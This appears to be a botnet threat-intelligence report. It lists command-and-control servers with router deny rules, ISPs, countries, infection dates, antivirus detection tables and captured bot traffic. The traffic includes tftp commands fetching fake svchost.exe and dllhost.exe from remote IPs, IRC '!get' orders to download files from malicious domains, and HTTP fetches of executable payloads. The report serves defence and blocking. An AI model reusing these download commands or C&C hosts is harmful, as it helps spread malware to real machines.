Filter deny ip host 200.49.145.197 any log ! 10 infects 09/04/09 to 01/23/10 allytech.com |
ISP allytech s.a |
| Clients 10 |
 argentina |
Activity |
Domain allytech.com |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 173.16.120.174 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 173.16.120.174 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|a6xnr2frjUSER a5fik9m7o * 0 :USA|2K|445
- Server: :hub.49011.net 001 P|a6xnr2frj...
- Client: USERHOST P|a6xnr2frj
- Server: :hub.49011.net 302 P|a6xnr2frj...
- Client: USERHOST P|a6xnr2frjMODE P|a6xnr2frj JOIN #mm RSA
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.BBMT |
| BitDefender | Generic.Mydoom.638E6D7B |
| CAT-QuickHeal | I-Kolabc.gza |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Kolabc.GZA!im |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Kolabc |
| Kaspersky | Kolabc.gza |
| McAfee | MISSED |
| Microsoft | Kolabc.C |
| NOD32v2 | MISSED |
| Norman | Akbot.BJT |
| Panda | Gaobot.OXI.worm |
| Prevx1 | MISSED |
| Rising | Dropper.Undef.GEN |
| Sophos | MalBehav-104 |
| Sunbelt | Generic!BT |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | KOLABC.GB |
| VBA32 | Kolabc.gza |
| VirusBuster | RBot.Gen.3 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 9 |
TCP Ports 10324 |
Filter deny ip host 67.43.236.67 any log ! 9 infects 08/17/09 to 12/28/09 - |
ISP nader dara |
| Clients 9 |
 lebanon |
Activity |
Domain - |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 194.126.184.69 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 194.126.184.69 get dllhost.exe wins\\DLLHOST.EXE
- Client: USER oqrpxi oqrpxi oqrpxi :uwcnesiidwfjpyko
- Client: NICK gEJwHkFa
- Client: MODE gEJwHkFa +xi
- Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
- Client: JOIN #las6 USERHOST gEJwHkFaMODE #m +smntuPRIVMSG #m...
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 gEJwHkFa #las6 :You\\'re not channel operator
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | VanBot.AX.116 |
| Authentium | MISSED |
| Avast | _SdBot-4142 |
| AVG | Generic_c.VB |
| BitDefender | Agent.YRG |
| CAT-QuickHeal | VanBot.ax |
| ClamAV | PUA.Packed.Expressor |
| DrWeb | IRC.Sdbot.945 |
| eSafe | VanBot.ax |
| eTrust-Vet | Linkbot.OC |
| Ewido | VanBot.ax |
| FileAdvisor | MISSED |
| Fortinet | VanBot.AX!tr.bdr |
| F-Prot | MISSED |
| F-Secure | VanBot.ax |
| Ikarus | Agent.YRG |
| Kaspersky | VanBot.ax |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Hupigon.gen83 |
| Panda | RXBot.AB.worm |
| Prevx1 | MISSED |
| Rising | IRCbot.fbi |
| Sophos | MISSED |
| Sunbelt | Agent.YRG |
| Symantec | IRCbot |
| TheHacker | BackdoorVanBot.ax |
| TrendMicro | MISSED |
| VBA32 | VanBot.ax |
| VirusBuster | RBot.ONM |
Webwasher
Gateway | VanBot.AX.116 |
| |
|
| Priority 8 |
TCP Ports 3305 |
Filter deny ip host 212.54.2.171 any log ! 8 infects 10/30/09 to 12/28/09 megabaud.fi |
ISP elisa oyj |
| Clients 8 |
 finland |
Activity |
Domain megabaud.fi |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 202.157.56.125 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 202.157.56.125 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|nold11864USER zspnyxd3k * 0 :USA|2K|633
- Server: :hub.35869.net 001 P|nold11864...
- Client: USERHOST P|nold11864
- Server: :hub.35869.net 302 P|nold11864...
- Client: USERHOST P|nold11864MODE P|nold11864 JOIN #mm RSA
- Client: PRIVMSG #mm...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.variant |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | IRCBot.idc |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot |
| eSafe | TRDropper |
| eTrust-Vet | IRCBot.KU |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | PossibleThreat |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | IRCBot.idc |
| Ikarus | Exploit.MS06040 |
| Kaspersky | IRCBot.idc |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Smalltroj.MTNE |
| Panda | Gaobot.OXI.worm |
| Prevx1 | MISSED |
| Rising | MS06-040.b |
| Sophos | MalPacker |
| Sunbelt | Wootbot.gen |
| Symantec | Spybot.Worm |
| TheHacker | BackdoorIRCBot.idc |
| TrendMicro | TROJ_LSADCOM.MCL |
| VBA32 | Kolabc.gco |
| VirusBuster | IRCBot.AAWX |
Webwasher
Gateway | MISSED |
| |
|
| Priority 8 |
TCP Ports 65520 65520
88 |
Filter deny ip host 122.195.190.197 any log ! 8 infects 12/30/09 to 01/07/10 canadian-solar.com |
ISP china unicom jiangsu province network |
| Clients 8 |
china |
Activity |
Domain canadian-solar.com |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 70.184.248.143 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 70.184.248.143 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK ynqsvhnjUSER r020500 . . :-
- Client: Service Pack 2JOIN &virtu
- Server: :u. PRIVMSG ynqsvhnj :!get http:/www.liagand.cn/img/unpr.gif:u...
- Client: GET /img/unpr.gif HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /erdown.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /pk/pw1022.exe HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: GET /p0905/2.0/d.bin?js02679582 HTTP/1.0Accept: */*User-Agent:...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /portal.php HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET /p1022/2.0/ms.bin?js0241037 HTTP/1.0Accept: */*User-Agent:...
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 8 |
TCP Ports 65520
91 |
Filter deny ip host 91.212.220.156 any log ! 8 infects 08/23/09 to 09/07/09 - |
ISP group vertical ltd |
| Clients 8 |
russian federation |
Activity |
Domain - |
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host:...
- Client: NICK dtugkmbeUSER i020501 . . :-
- Client: JOIN &virtu
- Server: :k. PRIVMSG dtugkmbe :!get http:/gidromash.cn/oc/box.txt
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: PONG :k.
- Client: JOIN &virtu
- Server: NICK jddwnomeUSER n020501 . . :-
- Client: JOIN &virtu
- Server: :l. PRIVMSG jddwnome :!get http:/gidromash.cn/oc/box.txt
- Server: PONG :l.
- Client: JOIN &virtu
- Server: PONG :l.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Korgo.V |
| Avast | _Virtob |
| AVG | Korgo.A |
| BitDefender | Padobot.BV.Dam |
| CAT-QuickHeal | Virut.Z |
| ClamAV | Virut-54 |
| DrWeb | Lsabot |
| eSafe | MISSED |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Korgo.V |
| F-Secure | MISSED |
| Ikarus | Padobot.M |
| Kaspersky | Padobot.m |
| McAfee | Virut.gen.a |
| Microsoft | Korgo.V |
| NOD32v2 | MISSED |
| Norman | Korgo.V |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Virut.an |
| Sophos | Virut-W |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Padobot.D |
Webwasher
Gateway | MISSED |
| |
|
| Priority 7 |
TCP Ports 65520 |
Filter deny ip host 221.5.74.39 any log ! 7 infects 08/13/09 to 08/17/09 cncnet.net |
ISP china unicom guangdong province network |
| Clients 7 |
china |
Activity |
Domain cncnet.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 222.234.215.213 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 222.234.215.213 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK jdhsdjqxUSER p020501 . . :-
- Client: JOIN &virtu
- Server: :j. PRIVMSG jdhsdjqx :!get http:/dretis.cn/oc/box.txt
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.D |
| AntiVir | Virut.Gen |
| Authentium | Virut.9264 |
| Avast | _Virut |
| AVG | Virut |
| BitDefender | Virtob.3.Gen |
| CAT-QuickHeal | Virut.D |
| ClamAV | Virut.ca |
| DrWeb | Virut.5 |
| eSafe | MISSED |
| eTrust-Vet | Virut.9276 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MetaCrypt.5 |
| F-Prot | Virut.9264 |
| F-Secure | Virut.n |
| Ikarus | Virut.d |
| Kaspersky | Virut.n |
| McAfee | Virut.gen |
| Microsoft | Virut.AK |
| NOD32v2 | Virut.E |
| Norman | Virut.D |
| Panda | Virutas.gen |
| Prevx1 | MISSED |
| Rising | Virut.GEN |
| Sophos | Virut-L |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | Virut.gen |
| TrendMicro | PE_VIRUT.D-2 |
| VBA32 | Virut.3 |
| VirusBuster | Virut.Gen |
Webwasher
Gateway | Virut.Gen |
| |
|
| Priority 7 |
TCP Ports 3305 |
Filter deny ip host 211.233.45.253 any log ! 7 infects 09/01/09 to 09/08/09 kidc.net |
ISP korea internet data center inc |
| Clients 7 |
 korea_ republic of |
Activity |
Domain kidc.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 96.8.226.33 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 96.8.226.33 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|tyz4nprpcUSER v7sfuv623 * 0 :USA|XP|126
- Server: :hub.49523.net 001 P|tyz4nprpc...
- Client: USERHOST P|tyz4nprpc
- Server: :hub.49523.net 302 P|tyz4nprpc...
- Client: USERHOST P|tyz4nprpcMODE P|tyz4nprpc JOIN #mm RSA
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | TRDropper.Gen |
| Authentium | Threat-HLLIYE!Eldorado |
| Avast | _DCom-F |
| AVG | Heur |
| BitDefender | Packer.Yoda.A |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.4 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Threat-HLLIYE!Eldorado |
| F-Secure | MISSED |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Heur.Generic |
| McAfee | MISSED |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalPacker |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | PAK_Generic.001 |
| VBA32 | MISSED |
| VirusBuster | PackedYoda |
Webwasher
Gateway | MISSED |
| |
|
| Priority 7 |
TCP Ports 65520 |
Filter deny ip host 83.133.119.206 any log ! 7 infects 02/06/10 to 02/08/10 greatnet.de |
ISP lncde-greatnet-newmedia |
| Clients 7 |
germany |
Activity |
Domain greatnet.de |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 116.126.215.24 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 116.126.215.24 get dllhost.exe wins\\DLLHOST.EXE
- Client: NICK lcntiouuUSER c020501 . . :_
- Client: JOIN &virtu
- Server: :u. PRIVMSG lcntiouu :!get...
- Client: GET /build/setup10.exe HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /oc/box.txt HTTP/1.0User-Agent: DownloadHost:...
- Server: GET /op/lgate.php?n=94AEEEDFFCB64848 HTTP/1.0Accept:...
- Server: GET /bt4/fout.php HTTP/1.0Accept: */*User-Agent: Mozilla/4.0...
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
- Server: PONG :j.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | Siggen.49592 |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | Cryptor |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | Suspicious.Insight |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 6 |
TCP Ports 3305 |
Filter deny ip host 61.120.62.28 any log ! 6 infects 08/13/09 to 08/22/09 dion.ne.jp |
ISP rabby_s inc |
| Clients 6 |
 japan |
Activity |
Domain dion.ne.jp |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 173.22.150.5 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 173.22.150.5 get dllhost.exe wins\\DLLHOST.EXE
- Client: PASS secretpass
- Client: NICK P|zr9eaoxa1USER dejgzufxb * 0 :USA|XP|577
- Server: :hub.10842.net 001 P|zr9eaoxa1...
- Client: USERHOST P|zr9eaoxa1
- Server: :hub.10842.net 302 P|zr9eaoxa1...
- Client: USERHOST P|zr9eaoxa1MODE P|zr9eaoxa1 JOIN #mm RSA
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | IRCBot.Gen |
| AntiVir | TRATRAPS.Gen |
| Authentium | MISSED |
| Avast | _DCom-F |
| AVG | SHeur2.AOLW |
| BitDefender | Generic.Mydoom.F72197F1 |
| CAT-QuickHeal | Agent.gen |
| ClamAV | MISSED |
| DrWeb | HLLW.Piabot.origin |
| eSafe | MISSED |
| eTrust-Vet | IRCBot.PJ |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | Kolabc.gza |
| Ikarus | Exploit.MS06040 |
| Kaspersky | Kolabc.gza |
| McAfee | Spybot.worm!l |
| Microsoft | Exploit_MS06040.gen |
| NOD32v2 | MISSED |
| Norman | Atraps.MQB |
| Panda | TrjCI.A |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MalBehav-004 |
| Sunbelt | MISSED |
| Symantec | Spybot.Worm |
| TheHacker | MISSED |
| TrendMicro | SPYBOT.BIM |
| VBA32 | MISSED |
| VirusBuster | RBot.Gen.3 |
Webwasher
Gateway | MISSED |
| |
|
| Priority 6 |
TCP Ports 80 |
Filter deny ip host 82.98.86.170 any log ! 6 infects 08/22/09 to 11/08/09 fhe3rz.net |
ISP sedo domain parking |
| Clients 6 |
germany |
Activity |
Domain fhe3rz.net |
Chatter Example
- Client: GET /xxxxxxx HTTP/1.0User-Agent: bHost: 203.180.17.238
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Server: GET...
- Server: GET /css/724/landing/en.css HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/body_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/td_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/container_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/keywords_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/bullet.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/pop_cat_top.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/searchtext_bg.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/search.jpg HTTP/1.0Accept: */*Referer:...
- Server: GET /images/724/footer_bg.jpg HTTP/1.0Accept: */*Referer:...
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
- Client: POST /w.php?ifc=0 HTTP/1.0Accept: image/gif, image/x-xbitmap,...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Korgo.46592 |
| AntiVir | Padobot.Z.2 |
| Authentium | Berbew.M |
| Avast | _Padobot-I |
| AVG | Generic7.ORM |
| BitDefender | Generic.208542 |
| CAT-QuickHeal | I-Padobot.z |
| ClamAV | Korgo.Z |
| DrWeb | HangUp.26 |
| eSafe | MISSED |
| eTrust-Vet | Berkor.A |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | Berbew.M |
| F-Secure | Padobot.z |
| Ikarus | Padobot.Z |
| Kaspersky | Padobot.z |
| McAfee | MISSED |
| Microsoft | Berbew.BE!dam |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | Berbew.d |
| Sophos | Doxpar-C |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | BKDR_BERBEW.Q |
| VBA32 | Padobot.z |
| VirusBuster | Padobot.B |
Webwasher
Gateway | MISSED |
| |
|
| Priority 5 |
TCP Ports 8080
72 |
Filter deny ip host 67.43.236.66 any log ! 5 infects 08/13/09 to 10/02/09 - |
ISP nader dara |
| Clients 5 |
lebanon |
Activity |
Domain - |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
- Client: USER iqelkq iqelkq iqelkq :rjrximinlwihoahg
- Client: NICK RODhbJxT
- Client: MODE RODhbJxT +xi
- Client: JOIN #las6 USERHOST RODhbJxTMODE #m +smntuPRIVMSG #m...
- Client: GET /rs3.exe HTTP/1.0Host: nadsamcabran12.com
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 RODhbJxT #las6 :You\\'re not channel operator
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: PING :hub.20582.com
- Server: :eh!Y@hoo.net PRIVMSG #las6 :* ipscan s.s.s.s dcom2 -sERROR...
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.AT |
| Authentium | Virut.AG |
| Avast | _Virtob |
| AVG | RBot.KB |
| BitDefender | IRC-Generic.3619 |
| CAT-QuickHeal | Virut.Y |
| ClamAV | Small-4287 |
| DrWeb | IRC.Sdbot.2665 |
| eSafe | TRCrypt.nspm |
| eTrust-Vet | Virut.6640 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.EM!tr.bdr |
| F-Prot | Virut.AG |
| F-Secure | Nepoe.em |
| Ikarus | MISSED |
| Kaspersky | Nepoe.em |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AA |
| NOD32v2 | MISSED |
| Norman | Virut.AH |
| Panda | Virutas.AH |
| Prevx1 | MISSED |
| Rising | Virut.al |
| Sophos | Virut-Gen |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.genS |
| TrendMicro | PE_VIRUT.AT |
| VBA32 | Nepoe.em |
| VirusBuster | PoeBot.OB |
Webwasher
Gateway | MISSED |
| |
|
| Priority 5 |
TCP Ports 8080 8080
67 |
Filter deny ip host 72.10.172.211 any log ! 5 infects 08/17/09 to 10/16/09 gtcomm.net |
ISP globotech communications |
| Clients 5 |
 canada |
Activity |
Domain gtcomm.net |
Chatter Example
- Client: dir dllcache\\tftpd.exe
- Client: tftp -i 24.103.196.250 get svchost.exe wins\\SVCHOST.EXE
- Client: tftp -i 24.103.196.250 get dllhost.exe wins\\DLLHOST.EXE
- Client: USER jseabq jseabq jseabq :dqhawgsvzjhxsrsm
- Client: NICK ErEDHMyl
- Client: MODE ErEDHMyl +xi
- Client: GET /rs3.exe HTTP/1.0Host: idfc.info
- Server: GET /f.exe HTTP/1.0Host: idfc.info
- Client: JOIN #las6 USERHOST ErEDHMylMODE #m +smntuPRIVMSG #m...
- Client: MODE #las6 +smntu
- Server: :hub.20582.com 482 ErEDHMyl #las6 :You\\'re not channel operator
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut |
| AntiVir | Virut.AT |
| Authentium | Virut.AG |
| Avast | _Virtob |
| AVG | RBot.KB |
| BitDefender | IRC-Generic.3619 |
| CAT-QuickHeal | Virut.Y |
| ClamAV | Small-4287 |
| DrWeb | IRC.Sdbot.2665 |
| eSafe | TRCrypt.nspm |
| eTrust-Vet | Virut.6640 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Nepoe.EM!tr.bdr |
| F-Prot | Virut.AG |
| F-Secure | Nepoe.em |
| Ikarus | MISSED |
| Kaspersky | Nepoe.em |
| McAfee | Virut.gen.a |
| Microsoft | Virut.AA |
| NOD32v2 | MISSED |
| Norman | Virut.AH |
| Panda | Virutas.AH |
| Prevx1 | MISSED |
| Rising | Virut.al |
| Sophos | Virut-Gen |
| Sunbelt | MISSED |
| Symantec | Virut.W |
| TheHacker | Virut.genS |
| TrendMicro | PE_VIRUT.AT |
| VBA32 | Nepoe.em |
| VirusBuster | PoeBot.OB |
Webwasher
Gateway | MISSED |
| |
|
| Priority 5 |
TCP Ports 65520 65520
216 |
Filter deny ip host 218.93.205.24 any log ! 5 infects 08/13/09 to 08/14/09 163data.com.cn |
ISP chinanet jiangsu province network |
| Clients 5 |
china |
Activity |
Domain 163data.com.cn |
Chatter Example
- Server: PONG :j.
- Client: JOIN &virtu
- Client: POST...
- Server: NICK ibeffknfUSER v020500 . . :_
- Client: Service Pack 2JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
- Server: PONG :i.
- Client: JOIN &virtu
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 4 |
TCP Ports 65520 65520
216 |
Filter deny ip host 218.93.205.23 any log ! 4 infects 08/19/09 to 08/20/09 163data.com.cn |
ISP chinanet jiangsu province network |
| Clients 4 |
china |
Activity |
Domain 163data.com.cn |
Chatter Example
- Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 85.132.5.169:1737
- Client: NICK hxpxonzsUSER c020501 . . :-
- Client: JOIN &virtu
- Server: :i. PRIVMSG hxpxonzs :!get http:/dretis.cn/oc/box.txt
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | Virut.B |
| AntiVir | Virut.AX |
| Authentium | Korgo.W |
| Avast | _Virtob |
| AVG | Korgo.D |
| BitDefender | Generic.1674959 |
| CAT-QuickHeal | Virut.Z |
| ClamAV | MISSED |
| DrWeb | Lsabot |
| eSafe | Virut.n |
| eTrust-Vet | Virut.7115 |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | Virut.AV |
| F-Prot | Korgo.W |
| F-Secure | Virut.av |
| Ikarus | Korgo.K |
| Kaspersky | Virut.av |
| McAfee | Virut.gen.a |
| Microsoft | Korgo.AB |
| NOD32v2 | MISSED |
| Norman | Korgo.Y |
| Panda | Virutas.FG |
| Prevx1 | MISSED |
| Rising | Junk.Virut.a |
| Sophos | Virut-W |
| Sunbelt | Generic!BT |
| Symantec | Virut.W |
| TheHacker | Virut.av |
| TrendMicro | PE_VIRUT.AV |
| VBA32 | Virut.2 |
| VirusBuster | Korgo.AB |
Webwasher
Gateway | MISSED |
| |
|
| Priority 4 |
TCP Ports 6900 |
Filter deny ip host 81.12.88.44 any log ! 4 infects 11/20/09 to 11/20/09 - |
ISP farhang arya communications company |
| Clients 4 |
 iran_ islamic republic of |
Activity |
Domain - |
Chatter Example
- Client: NICK Bisho911USER htiwa 0 0 :Bisho911
- Server: :fart.bitchassness.shit NOTICE Bisho911 :*** If you are having...
- Server: PONG :940FFB4F
- Client: JOIN ##!X4
- Client: USERHOST Bisho911MODE Bisho911 -x+iJOIN ##!X4 USERHOST...
- Server: :fart.bitchassness.shit NOTICE Bisho911 :Setting/removing of...
- Server: PONG :fart.bitchassness.shit
more.... |
BotClient Antivirus Diagnoses
| AhnLab-V3 | MISSED |
| AntiVir | MISSED |
| Authentium | MISSED |
| Avast | MISSED |
| AVG | MISSED |
| BitDefender | MISSED |
| CAT-QuickHeal | MISSED |
| ClamAV | MISSED |
| DrWeb | MISSED |
| eSafe | MISSED |
| eTrust-Vet | MISSED |
| Ewido | MISSED |
| FileAdvisor | MISSED |
| Fortinet | MISSED |
| F-Prot | MISSED |
| F-Secure | MISSED |
| Ikarus | MISSED |
| Kaspersky | MISSED |
| McAfee | MISSED |
| Microsoft | MISSED |
| NOD32v2 | MISSED |
| Norman | MISSED |
| Panda | MISSED |
| Prevx1 | MISSED |
| Rising | MISSED |
| Sophos | MISSED |
| Sunbelt | MISSED |
| Symantec | MISSED |
| TheHacker | MISSED |
| TrendMicro | MISSED |
| VBA32 | MISSED |
| VirusBuster | MISSED |
Webwasher
Gateway | MISSED |
| |
|
| Priority 3 |
TCP Ports 6668 6667 |
Filter deny ip host 91.121.83.177 any log ! 3 infects 08/22/09 to 08/22/09 gergosnet.com |
ISP ovh sas |
| Clients 3 |
france |
Activity |
Domain gergosnet.com |
Chatter Example
- Client: USER 1
- Server: 331 Password required
- Client: PASS 1
- Server: 230 User logged in.
- Server: RETR mode.exe
- Server: 150 Opening BINARY mode data connection
